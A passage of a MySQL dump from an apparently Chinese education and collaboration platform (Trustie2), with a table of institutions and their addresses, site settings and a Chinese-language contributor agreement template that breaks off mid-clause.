22:14:06',NULL,'qinghaidaxuekunlunxueyuan',0,'西宁','宁张路175号',0,NULL,NULL),(3055,'西宁城市职业技术学院','青海','2017-09-14 09:51:49','2017-10-13 22:14:06',NULL,'xiningchengshizhiyejishuxueyuan',0,'西宁','宁张路295号',0,NULL,NULL),(3056,'青海高等职业技术学院','青海','2017-09-14 09:52:17','2017-10-13 22:14:06',NULL,'qinghaigaodengzhiyejishuxueyuan',0,'海东','乐都区文教路G109(京拉线)',0,NULL,NULL),(3057,'青海柴达木职业技术学院','青海','2017-09-14 09:52:45','2017-10-13 22:14:06',NULL,'qinghaichaidamuzhiyejishuxueyuan',0,'西宁','海西蒙古族藏族自治州德令哈市都兰西路32',0,NULL,NULL),(3058,'宁夏大学新华学院','宁夏','2017-09-14 09:53:17','2017-10-13 22:14:06',NULL,'ningxiadaxuexinhuaxueyuan',0,'银川','西夏区贺兰山西路686号',0,NULL,NULL),(3059,'中国矿业大学银川学院','宁夏','2017-09-14 09:53:45','2017-10-13 22:14:06',NULL,'zhongguokuangyedaxueyinchuanxueyuan',0,'银川','西夏区金波北街',0,NULL,NULL),(3060,'宁夏警官职业学院','宁夏','2017-09-14 09:54:06','2017-10-13 22:14:06',NULL,'ningxiajingguanzhiyexueyuan',0,'银川','西夏区学院东路350号',0,NULL,NULL),(3061,'宁夏葡萄酒与防沙治沙职业技术学院','宁夏','2017-09-14 09:54:30','2017-10-13 22:14:06',NULL,'ningxiaputaojiuyufangshazhishazhiyejishuxueyuan',0,'银川','回族自治区银川市永宁县广夏路',0,NULL,NULL),(3062,'宁夏幼儿师范高等专科学校','宁夏','2017-09-14 09:54:47','2017-10-13 22:14:06',NULL,'ningxiayouershifangaodengzhuankexuexiao',0,'银川','回族自治区银川市兴庆区业勤南街',0,NULL,NULL),(3063,'宁夏艺术职业学院','宁夏','2017-09-14 09:55:09','2017-10-13 22:14:06',NULL,'ningxiayishuzhiyexueyuan',0,'银川','同心北路与培华路向北',0,NULL,NULL),(3064,'宁夏体育职业学院','宁夏','2017-09-14 09:55:25','2017-10-13 22:14:06',NULL,'ningxiatiyuzhiyexueyuan',0,'银川','贺兰山西路855号',0,NULL,NULL),(3065,'新疆大学科学技术学院','新疆','2017-09-14 09:55:48','2017-10-13 22:14:06',NULL,'xinjiangdaxuekexuejishuxueyuan',0,'乌鲁木齐','西北路499号 ',0,NULL,NULL),(3066,'新疆农业大学科学技术学院','新疆','2017-09-14 09:56:04','2017-10-13 22:14:06',NULL,'xinjiangnongyedaxuekexuejishuxueyuan',0,'乌鲁木齐','农大东路110号新..',0,NULL,NULL),(3067,'新疆医科大学厚博学院','新疆','2017-09-14 09:56:25','2017-10-13 22:14:06',NULL,'xinjiangyikedaxuehouboxueyuan',0,'乌鲁木齐','鲤鱼山路23号附近',0,NULL,NULL),(3068,'新疆财经大学商务学院','新疆','2017-09-14 09:56:41','2017-10-13 22:14:06',NULL,'xinjiangcaijingdaxueshangwuxueyuan',0,'乌鲁木齐','杭州西街237号',0,NULL,NULL),(3069,'石河子大学科技学院','新疆','2017-09-14 09:57:12','2017-10-13 22:14:06',NULL,'shihezidaxuekejixueyuan',0,'石河子','31小区',0,NULL,NULL),(3070,'新疆生产建设兵团兴新职业技术学院','新疆','2017-09-14 09:57:32','2017-10-13 22:14:06',NULL,'xinjiangshengchanjianshebingtuanxingxinzhiyejishuxueyuan',0,'乌鲁木齐','头屯街兵友路45号 ',0,NULL,NULL),(3071,'哈密职业技术学院','新疆','2017-09-14 09:58:13','2017-10-13 22:14:06',NULL,'hamizhiyejishuxueyuan',0,'哈密','伊州区八一路',0,NULL,NULL),(3072,'新疆科技职业技术学院','新疆','2017-09-14 09:58:31','2017-10-13 22:14:06',NULL,'xinjiangkejizhiyejishuxueyuan',0,'乌鲁木齐','五家渠市猛进南路980号',0,NULL,NULL),(3073,'吐鲁番职业技术学院','新疆','2017-09-14 09:58:58','2017-10-13 22:14:06',NULL,'tulufanzhiyejishuxueyuan',0,'吐鲁番','G30(连霍高速)',0,NULL,NULL),(3074,'博尔塔拉职业技术学院','新疆','2017-09-14 09:59:50','2017-10-13 22:14:06',NULL,'boertalazhiyejishuxueyuan',0,'博乐','博尔塔拉蒙古自治州博乐市赛里木湖路南200米',0,NULL,NULL),(3075,'新疆工业职业技术学院','新疆','2017-09-14 10:00:09','2017-10-13 22:14:06',NULL,'xinjianggongyezhiyejishuxueyuan',0,'乌鲁木齐','头屯河区头屯河公路555号',0,NULL,NULL),(3076,'南阳盛世光明软件有限公司','河南','2017-09-22 19:41:37','2017-10-13 22:14:06',NULL,'nanyangshengshiguangmingruanjianyouxiangongsi',0,'南阳','高新区区委21楼',0,NULL,NULL),(3077,'广州市奕特信息科技有限公司','广东','2017-10-13 15:12:18','2017-10-13 22:14:06',NULL,'guangzhoushiyitexinxikejiyouxiangongsi',0,'广州','天河区高唐路234号A栋504',0,NULL,NULL),(3078,'浪潮国际有限公司','香港','2017-10-18 10:05:17','2017-10-18 10:05:17',NULL,'langchaoguoji',0,'九龙','九龙湾宏光道1号亿京中心A座30楼B&C室',0,'',NULL),(3082,'湖南合天智汇信息技术有限公司','湖南','2017-11-14 09:08:32','2017-11-14 09:08:32',NULL,'hunanhetianzhihuixinxijishuyouxiangongsi',0,'长沙','长沙市芯城科技园园5栋7楼',0,NULL,NULL),(3083,'浪潮通用软件有限公司','山东','2017-11-14 18:48:30','2017-11-14 18:48:30',NULL,'langchaotongyongruanjianyouxiangongsi',0,'济南','山东省济南市高新区浪潮路1036号',0,'',NULL),(3087,'福州咸鱼科技有限公司','福建','2017-11-15 12:44:22','2017-11-15 12:44:22',NULL,'fuzhouxianyukejiyouxiangongsi',0,'福州','福州市金山大道橘园洲创意产业园',0,NULL,NULL),(3090,'山东恒道信息技术有限公司','山东','2017-11-30 12:04:29','2017-11-30 12:04:29',NULL,'shandonghengdaoxinxijishuyouxiangongsi',0,'济南','经四路万达广场B907',0,NULL,NULL),(3091,'昆山中创软件工程有限责任公司','江苏','2017-12-04 11:05:24','2017-12-04 11:05:24',NULL,'kunshanzhongchuangruanjiangongchengyouxianzerengongsi',0,'苏州','中国江苏省苏州市昆山市巴城镇学院路388号',0,NULL,NULL),(3093,'浙江航天恒嘉数据科技有限公司','浙江','2017-12-19 09:02:24','2017-12-19 09:02:24',NULL,'zhejianghangtianhengjiashujukejiyouxiangongsi',0,'嘉兴','平湖市乍浦镇',0,NULL,NULL),(3095,'中国科学院计算技术研究所','北京','2018-01-12 16:55:17','2018-01-12 16:55:17',NULL,'zhongguokexueyuanjisuanjishuyanjiusuo',0,'海淀','科学院南路6号',0,NULL,NULL),(3096,'苏州富鑫林光电科技有限公司','江苏','2018-01-12 17:05:11','2018-01-12 17:05:11',NULL,'suzhoufuxinlinguangdiankejiyouxiangongsi',0,'苏州','苏州市园区金浦路11号',0,NULL,NULL),(3097,'丽多网络科技有限公司','江苏','2018-01-12 22:22:56','2018-01-12 22:22:56',NULL,'liduowangluokejiyouxiangongsi',0,'苏州','苏州工业园区若水路纳米大学科技园',0,NULL,NULL),(3098,'深圳有为信息技术有限公司','广东','2018-01-16 11:23:15','2018-01-16 11:23:15',NULL,'shenzhenyouweixinxijishuyouxiangongsi',0,'深圳','梅田',0,NULL,NULL),(3099,'北京市育英学校','北京','2018-01-29 13:41:47','2018-01-29 13:41:47',NULL,'beijingshiyuyingxuexiao',0,'海淀','北京市海淀区万寿路西街11号',0,NULL,NULL),(3100,'码农谷','湖南','2018-01-29 18:36:06','2018-01-29 18:36:06',NULL,'manonggu',0,'长沙','长沙市',0,NULL,NULL),(3101,'北京大学附属中学','北京','2018-01-29 22:05:48','2018-01-29 22:05:48',NULL,'beijingdaxuefushuzhongxue',0,'海淀','海淀剧院旁',0,NULL,NULL),(3102,'陕西省国际信托股份有限公司','陕西','2018-02-01 15:21:26','2018-02-01 15:21:26',NULL,'shanxishengguojixintuogufenyouxiangongsi',0,'西安','高新区科技路50号',0,NULL,NULL),(3105,'北京富庆达科技有限公司','北京','2018-03-07 10:28:24','2018-03-07 10:28:24',NULL,'beijingfuqingdakejiyouxiangongsi',0,'海淀','北京海淀区上地科实大厦A座903',0,NULL,NULL),(3108,'虫智科技','湖南','2018-03-14 14:08:47','2018-03-14 14:08:47',NULL,'chongzhikeji',0,'长沙','高新区麓谷',0,NULL,NULL),(3109,'景优教育','湖南','2018-03-15 09:45:50','2018-03-15 09:45:50',NULL,'jingyoujiaoyu',0,'长沙','岳麓区金盆岭',0,NULL,NULL),(3110,'湖南厚溥教育科技有限公司','湖南','2018-03-17 19:30:30','2018-03-17 19:30:30',NULL,'hunanhoupujiaoyukejiyouxiangongsi',0,'长沙','湖南省长沙市岳麓区文轩路',0,NULL,NULL),(3112,'唯品会','广东','2018-03-26 11:23:15','2018-03-26 11:23:15',NULL,'weipinhui',0,'广州','花海街6号唯品大学',0,NULL,NULL),(3113,'湖南强智科技发展有限公司','湖南','2018-03-26 11:27:06','2018-03-26 11:27:06',NULL,'hunanqiangzhikejifazhanyouxiangongsi',0,'长沙','麓谷企业广场F4栋11F',0,NULL,NULL),(3116,'陕西理工大学','陕西','2018-04-04 16:32:36','2018-04-04 16:32:36',NULL,'shanxiligongdaxue',0,'汉中','陕西省汉中市汉台区朝阳路1号陕西理工学院物电学院',0,NULL,NULL),(3118,'广西岑溪市中等专业学校','广西','2018-04-10 17:37:58','2018-04-10 17:37:58',NULL,'guangxicenxishizhongdengzhuanyexuexiao',0,'梧州','广西岑溪市育才路503号',0,NULL,NULL),(3121,'福建锐驰智联','湖南','2018-04-14 15:20:44','2018-04-14 15:20:44',NULL,'fujianruichizhilian',0,'长沙','新长海中心',0,NULL,NULL),(3126,'富士康','广东','2018-04-23 18:53:05','2018-04-23 18:53:05',NULL,'fushikang',0,'深圳','深圳龙华富士康',0,NULL,NULL),(3131,'成都优易数据有限公司','四川','2018-05-03 10:08:33','2018-05-03 10:08:33',NULL,'chengduyouyishujuyouxiangongsi',0,'成都','成都市郫都区菁蓉镇静园东路28号优易数据大厦F3',0,NULL,NULL),(3133,'湖南省自兴人工智能研究院','湖南','2018-05-09 10:36:21','2018-05-09 10:36:21',NULL,'zixingrengongzhineng',0,'长沙','长沙市岳麓区麓谷信息港7楼',0,'',NULL),(3134,'鲅鱼圈区职业中专','辽宁','2018-05-13 17:09:02','2018-05-13 17:09:02',NULL,'boyuquanquzhiyezhongzhuan',0,'营口','鲅鱼圈区职业中专',0,NULL,NULL),(3136,'国防科学技术大学电子对抗学院','安徽','2018-05-14 13:50:36','2018-05-14 13:50:36',NULL,'guofangkexuejishudaxuedianziduikangxueyuan',0,'合肥','国防科学技术大学电子对抗学院',0,NULL,NULL),(3137,'武警警官学院','四川','2018-05-15 17:16:48','2018-05-15 17:16:48',NULL,'wujingjingguanxueyuan',0,'成都','双流区,警校路一段489号',0,NULL,NULL),(3138,'西北工业大学软件学院','陕西','2018-05-16 23:00:02','2018-05-16 23:00:02',NULL,'xibeigongyedaxueruanjianxueyuan',0,'西安','三桥',0,NULL,NULL),(3139,'武警工程大学','陕西','2018-05-16 23:04:13','2018-05-17 18:49:32',NULL,'wujinggongchengdaxue',0,'西安','未央区三桥武警工程大学家属院东门',1,NULL,'2018-05-17 18:49:32'),(3142,'未来科技公司','广东','2018-05-28 08:11:01','2018-05-28 08:11:01',NULL,'weilaikejigongsi',0,'广州','广州天河区47号',0,NULL,NULL),(3144,'上海伴榕资产管理有限公司','上海','2018-06-08 12:55:20','2018-06-08 12:55:20',NULL,'shanghaibanrongzichanguanliyouxiangongsi',0,'闵行','上海市闵行区秀文路898号西子国际2号楼',0,NULL,NULL),(3148,'长郡中学','湖南','2018-06-19 10:17:51','2018-06-19 10:17:51',NULL,'changjunzhongxue',0,'长沙','南门口',0,NULL,NULL),(3149,'长沙市一中','湖南','2018-06-19 10:49:06','2018-06-19 10:49:06',NULL,'changshashiyizhong',0,'长沙','长沙市一中',0,NULL,NULL),(3154,'南加利福尼亚大学','海外','2018-06-20 15:55:41','2018-06-20 15:55:41',NULL,'nanjialifuniyadaxue',0,'美国','美国 洛杉矶',0,NULL,NULL),(3155,'罗斯霍曼理工学院','海外','2018-06-20 17:17:36','2018-06-20 17:17:36',NULL,'luosihuomanligongxueyuan',0,'美国','特雷霍特 印第安纳州',0,NULL,NULL),(3156,'周南中学','湖南','2018-06-21 17:52:25','2018-06-21 17:52:25',NULL,'zhounanzhongxue',0,'长沙','湖南省长沙市开福区北正街291号',0,NULL,NULL),(3157,'长沙市第六中学','湖南','2018-06-25 10:57:59','2018-06-25 10:57:59',NULL,'changshashidiliuzhongxue',0,'长沙','长沙市',0,NULL,NULL),(3158,'青岛海尔教育科技有限公司','山东','2018-07-02 14:16:09','2018-07-02 14:16:09',NULL,'qingdaohaierjiaoyukejiyouxiangongsi',0,'青岛','海尔路1号海尔工业园',0,NULL,NULL),(3159,'绿色计算产业联盟','北京','2018-08-06 15:26:49','2018-08-06 15:26:49',NULL,'lvsejisuanchanyelianmeng',0,'海淀','万寿路27号',0,NULL,NULL),(3160,'微网云(深圳)技术有限公司','广东','2018-09-05 13:58:54','2018-09-05 13:58:54',NULL,'weiwangyunshenzhenjishuyouxiangongsi',0,'深圳','罗湖区银湖路金湖一街39-2',0,NULL,NULL),(3161,'中国电子工业标准化技术协会','北京','2018-09-07 12:38:28','2018-09-07 12:38:28',NULL,'zhongguodianzigongyebiaozhunhuajishuxiehui',0,'海淀','海淀区万寿路27号',0,NULL,NULL),(3162,'SKhynix','北京','2018-10-12 17:40:22','2018-10-12 17:40:22',NULL,'SKhynix',0,'朝阳','北京市朝阳区建国门外大街深甲6号SK大厦2501~02(100022)',0,NULL,NULL);
|
||
/*!40000 ALTER TABLE `schools` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `section_notices`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `section_notices`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `section_notices` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`forum_section_id` int(11) DEFAULT NULL,
|
||
`content` text,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_section_notices_on_forum_section_id` (`forum_section_id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=4 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `section_notices`
|
||
--
|
||
|
||
LOCK TABLES `section_notices` WRITE;
|
||
/*!40000 ALTER TABLE `section_notices` DISABLE KEYS */;
|
||
INSERT INTO `section_notices` VALUES (1,111,13,'欢迎大家\n','2020-08-10 09:46:59','2020-09-14 09:27:08'),(3,111,14,'欢迎大家','2020-08-21 09:33:40','2020-08-21 09:33:40');
|
||
/*!40000 ALTER TABLE `section_notices` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `seems_rateable_cached_ratings`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `seems_rateable_cached_ratings`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `seems_rateable_cached_ratings` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`cacheable_id` bigint(20) DEFAULT NULL,
|
||
`cacheable_type` varchar(255) DEFAULT NULL,
|
||
`avg` float NOT NULL,
|
||
`cnt` int(11) NOT NULL,
|
||
`dimension` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `seems_rateable_cached_ratings`
|
||
--
|
||
|
||
LOCK TABLES `seems_rateable_cached_ratings` WRITE;
|
||
/*!40000 ALTER TABLE `seems_rateable_cached_ratings` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `seems_rateable_cached_ratings` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `seems_rateable_rates`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `seems_rateable_rates`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `seems_rateable_rates` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`rater_id` bigint(20) DEFAULT NULL,
|
||
`rateable_id` int(11) DEFAULT NULL,
|
||
`rateable_type` varchar(255) DEFAULT NULL,
|
||
`stars` float NOT NULL,
|
||
`dimension` varchar(255) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`is_teacher_score` int(11) DEFAULT '0',
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `seems_rateable_rates`
|
||
--
|
||
|
||
LOCK TABLES `seems_rateable_rates` WRITE;
|
||
/*!40000 ALTER TABLE `seems_rateable_rates` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `seems_rateable_rates` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `settings`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `settings`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `settings` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`name` varchar(255) NOT NULL DEFAULT '',
|
||
`value` text,
|
||
`updated_on` datetime DEFAULT NULL,
|
||
PRIMARY KEY (`id`),
|
||
KEY `index_settings_on_name` (`name`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=21 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `settings`
|
||
--
|
||
|
||
LOCK TABLES `settings` WRITE;
|
||
/*!40000 ALTER TABLE `settings` DISABLE KEYS */;
|
||
INSERT INTO `settings` VALUES (1,'pack_attachment_max_size','51200','2018-07-02 11:23:12'),(2,'delayjob_enabled','1','2018-07-02 11:23:13'),(3,'host_course','210.79.227.194','2019-01-14 15:54:10'),(4,'host_contest','210.79.227.194','2019-01-14 15:54:10'),(5,'host_user','210.79.227.194','2019-01-14 15:54:10'),(6,'host_repository','210.79.227.194','2019-01-14 15:54:10'),(7,'app_title','Trustie2','2019-01-14 15:54:10'),(8,'welcome_text','','2019-01-14 15:54:10'),(9,'attachment_max_size','51200','2019-01-14 15:54:10'),(10,'per_page_options','25,50,100','2019-01-14 15:54:10'),(11,'activity_days_default','30','2019-01-14 15:54:10'),(12,'host_name','210.79.227.194','2019-01-14 15:54:10'),(13,'protocol','http','2019-01-14 15:54:10'),(14,'text_formatting','textile','2019-01-14 15:54:10'),(15,'cache_formatted_text','0','2019-01-14 15:54:10'),(16,'wiki_compression','','2019-01-14 15:54:10'),(17,'feeds_limit','15','2019-01-14 15:54:10'),(18,'file_max_size_displayed','5120','2019-01-14 15:54:10'),(19,'diff_max_lines_displayed','1500','2019-01-14 15:54:10'),(20,'repositories_encodings','UTF-8','2019-01-14 15:54:10');
|
||
/*!40000 ALTER TABLE `settings` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `shares`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `shares`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `shares` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`created_on` date DEFAULT NULL,
|
||
`url` varchar(255) DEFAULT NULL,
|
||
`title` varchar(255) DEFAULT NULL,
|
||
`share_type` int(11) DEFAULT NULL,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
`project_id` int(11) DEFAULT NULL,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `shares`
|
||
--
|
||
|
||
LOCK TABLES `shares` WRITE;
|
||
/*!40000 ALTER TABLE `shares` DISABLE KEYS */;
|
||
/*!40000 ALTER TABLE `shares` ENABLE KEYS */;
|
||
UNLOCK TABLES;
|
||
|
||
--
|
||
-- Table structure for table `sign_agreement_settings`
|
||
--
|
||
|
||
DROP TABLE IF EXISTS `sign_agreement_settings`;
|
||
/*!40101 SET @saved_cs_client = @@character_set_client */;
|
||
/*!40101 SET character_set_client = utf8 */;
|
||
CREATE TABLE `sign_agreement_settings` (
|
||
`id` int(11) NOT NULL AUTO_INCREMENT,
|
||
`user_id` int(11) DEFAULT NULL,
|
||
`title` varchar(255) DEFAULT NULL,
|
||
`content` text,
|
||
`created_at` datetime NOT NULL,
|
||
`updated_at` datetime NOT NULL,
|
||
PRIMARY KEY (`id`)
|
||
) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8;
|
||
/*!40101 SET character_set_client = @saved_cs_client */;
|
||
|
||
--
|
||
-- Dumping data for table `sign_agreement_settings`
|
||
--
|
||
|
||
LOCK TABLES `sign_agreement_settings` WRITE;
|
||
/*!40000 ALTER TABLE `sign_agreement_settings` DISABLE KEYS */;
|
||
INSERT INTO `sign_agreement_settings` VALUES (1,50,'应征投稿协议内容','投稿协议内容示例,请在管理 -- 创客 -- 基础数据 -- 应征投稿协议内容 修改.\r\n\r\n **在您通过本平台在线签署应征投稿合同前,请您认真细致地阅读以下《应征投稿协议》,特别是其中以粗体下划线明显标注的条款,并在您同意了下述协议条款再正式进入后续程序**\r\n\r\n本协议由甲方(任务发布方)和乙方(应征者)在线签订,请甲乙双方仔细阅读协议内容, **请务必审慎阅读、充分理解各条款内容,特别是免除或者限制责任的条款、法律适用和争议解决条款**。 甲乙双方点击接受本协议,即意味着已阅读、理解并接受本协议所有条款,并对本协议条款的含义及相应的法律后果已全部知晓并充分认可。甲乙双方点击确认本协议后,本协议即产生法律约束力。\r\n\r\n本协议内容包括协议正文及甲乙双方在线相互确认的合同。所签订的合同、合同附件为本协议不可分割的一部分,与本协议正文具有同等法律效力。若您继续使用本平台创客空间,则表明您已经完全知晓、认可并同意遵守本协议内容、所有汇新云已经发布的各类规则以及签订的合同。\r\n\r\n在阅读本协议的过程中,如不同意本协议或其中任何条款约定,应拒绝接受本协议所约定的内容,甲乙双方都有权自主选择拒绝达成合作。\r\n\r\n#####1.定义\r\n\r\n除非本协议另有约定,在本协议中所用下列术语定义如下:\r\n\r\n1.1 本平台:是指www.XXXXXX.com 为用户提供需求信息发布、交流,第三方以“企业”或“个人”入驻的形式应征需求的电子商务交易服务平台;\r\n\r\n1.2 用户:指在本平台合法注册,接受并认可服务平台相关协议、规则、规范、制度等的自然人、法人或其他非法人组织。\r\n\r\n1.3 甲方:指在本平台上发布创客需求的用户。\r\n\r\n1.4 乙方:是指经本平台审核通过入驻本平台,根据需求方发布的需求,提供各种定制服务或IT产品,在平台开展业务经营的企业或个人。\r\n\r\n1.5 服务需求:指甲方基于自身需求向乙方提出的具体服务要求。\r\n\r\n1.6 项目款:指甲方和乙方的交易金额,即本协议约定交易金额或后续经协商调整后确定的交易总金额。\r\n\r\n1.7 平台账户:指用户在本平台注册的帐号,用户只能通过该帐户登陆服务平台进行交易。\r\n\r\n#####2.甲方权利义务\r\n\r\n2.1 甲方应当根据服务需求主动向乙方提交本项目所需的相关资料,并保证该资料的真实性、合法性、准确性、完整性,如因甲方未按照前述标准提供资料导致乙方无法履行协议义务,由此产生的责任由甲方自行承担。\r\n\r\n2.2 甲方在向乙方提交项目所涉及资料时有权一并对乙方的服务提出建议和思路,同时有权在验收时对乙方的服务成果提出修改意见,但甲方提出的服务建议或思路以及修改意见应当明确具体,如不明确,有权不听取建议或拒绝修改,同时甲方不得借机拖延进度及应支付的款项,甲方提出超出协议或合同约定范围的修改要求,乙方有权拒绝或者另行收取费用。\r\n\r\n2.3 甲方未按照合同在约定的日期内支付项目款的,乙方有权拒绝或顺延提供服务。\r\n\r\n2.4 甲方应充分了解且同意遵守服务平台公布的所有协议、规则、制度等文件,并按照服务平台的相关规定处理相关交易事项。\r\n\r\n2.5 甲方应及时验收乙方交付的服务成果(包括阶段成果和最终成果),如乙方向甲方提交服务成果后在规定期限日内甲方未给出具体验收意见的,视为乙方提交的服务成果合格。如有下一阶段服务的,乙方有权继续推进;如下一阶段服务因甲方原因导致无法继续推进的,乙方不承担任何责任。\r\n\r\n2.6 甲方有义务向乙方提供必要的配合义务,包括提供必要资料、及时验收、及时回复等。\r\n\r\n**2.7 甲方同意并知晓,乙方仅提供合法、合规、合理的服务,对甲方违背法律法规或行政规章的服务要求,乙方有权拒绝提供服务。**\r\n\r\n\r\n\r\n**2.8 甲方应当保证委托的服务事项不违反任何法律法规或侵犯他人合法权利,否则乙方有权拒绝提供服务并有权立即解除本协议。**\r\n\r\n\r\n\r\n**2.9 甲方应当保证合法使用乙方提交的服务成果,不得将服务成果用于任何违法违规或侵犯他人合法权益的活动,甲方应自行承担服务成果使用过程中发生的全部责任。**\r\n\r\n\r\n\r\n**2.10 甲方同意,为便于双方交易,本协议作为交易的主要内容和双方之间权利义务的根本性约定,具体服务项目、期限、金额等甲方在平台与乙方签订电子合同时在合同上予以标注,甲方对在合同中提供的所有信息的真实性负责。**\r\n\r\n\r\n\r\n**2.11 甲方在签订线下子合同时,应仔细确认所需要的服务内容、价格、数量、交付方式等信息。该信息将作为甲方的真实意思表示,甲方应对该等信息的法律后果承担责任。**\r\n\r\n\r\n\r\n**2.12 甲方理解并同意:签订线下合同时系统生成的订单信息是计算机信息系统根据乙方填写的内容自动生成的数据,仅是乙方发出的合同要约;甲方收到乙方的合同信息内容并确认签字后,合同生效。**\r\n\r\n\r\n\r\n**2.13 甲方同意并授权平台方保存其信息(包括但不限于注册信息)**\r\n\r\n\r\n\r\n#####3. 乙方权利义务\r\n\r\n3.1 乙方应按照合同约定的时间和质量向甲方提供服务。\r\n\r\n\r\n\r\n3.2 乙方应当积极听取甲方的修改意见,甲方提出合理需求且提出明确的修改意见的,乙方在提交服务成果后可提供修改服务,但超出合同约定内容的修改需求乙方有权拒绝。\r\n\r\n\r\n\r\n3.3 乙方应当对甲方提供的相关资料承担保密义务,除为履行本协议义务及法律规定外,不得向第三方透露。\r\n\r\n\r\n\r\n3.4 乙方有权要求甲方按照合同约定的日期支付相应款项,否则乙方有权拒绝、顺延提供服务和不发起项目验收;\r\n\r\n\r\n\r\n3.5 甲方与乙方约定分阶段工作的,乙方完成阶段性工作并发起验收,甲方应在规定期限日内予以验收确认,验收合格后乙方有权要求甲方支付下一开发阶段的项目启动资金;如甲方在规定期限日内未予以验收的,则视为验收合格。\r\n\r\n\r\n\r\n3.6 在双方签订的合同生效后,乙方有权要求甲方先支付阶段性工作的项目启动资金进行托管后,再进行工作。\r\n\r\n\r\n\r\n3.7 因乙方自身原因导致约定分阶段工作未能如期完成并交付,则乙方需要与甲方提前协商沟通,并在汇新云平台上发起项目延期函,甲方进行确认后方可生效。若乙方未提前发起项目延期函并与甲方确认,否则乙方需按照约定的日期进行交付,由此产生的责任由乙方自行承担。\r\n\r\n\r\n\r\n3.8 乙方应按照法律规定自行缴纳相应税费。\r\n\r\n\r\n\r\n3.9 乙方可能会向实现甲方需求所必须的关联方或合作伙伴共享甲方的订单信息,以保障为甲方提供的服务顺利进行。比如乙方必须将甲方的订单信息与第三方服务商共享来实现甲方的服务需求,并使其完成后续的售后服务,甲方对此无异议。\r\n\r\n\r\n\r\n3.10 乙方应将平台方公布的最新信息传递给甲方,维护三方合作关系。\r\n\r\n\r\n\r\n3.11 乙方对服务中产生的因己方原因造成的甲方损失负有责任,应负责解决;若因此对平台造成损失的,乙方应赔偿平台方全部损失。\r\n\r\n\r\n\r\n#####4.服务平台方权利义务\r\n\r\n4.1 平台方对甲乙双方的注册申请有审核决定的权利;\r\n\r\n\r\n\r\n4.2 平台方享有为维护系统而短暂停止服务的权利,暂停服务之前,平台方将在系统进行通知,甲乙双方应留意公告并做好相应备份工作。\r\n\r\n\r\n\r\n4.3 平台方有权根据中国法律法规的调整、行政执法机关的命令和社会伦理道德的变化相应调整在线管理服务的审核标准,甲乙双方不得以类似“以前曾通过汇新云服务审核”的理由要求平台方继续审核通过;\r\n\r\n\r\n\r\n4.4 乙方使用服务平台的账号密码所进行的一切操作视为乙方行为。乙方应妥善平台的账号密码,否则由此造成的一切后果由乙方承担;一旦发生安全问题应立即通知平台方以共同采取措施包括但不限于冻结账号等。\r\n\r\n\r\n\r\n4.5 平台方有权根据自身需求改变平台服务规则,并在服务平台进行公告;\r\n\r\n\r\n\r\n4.6 若乙方超过90天不使用平台账号的,平台方有权屏蔽或注销其账号。\r\n\r\n\r\n\r\n\r\n\r\n#####5. 知识产权\r\n\r\n5.1 本协议所产生成果的知识产权在甲方支付完全部项目款后,归甲方所有,乙方或乙方委托提供服务的第三方保留法律规定禁止转让部分的知识产权,同时保留服务成果用于案例展示、评选的权利。但甲方与乙方另有约定的除外。\r\n\r\n\r\n\r\n5.2 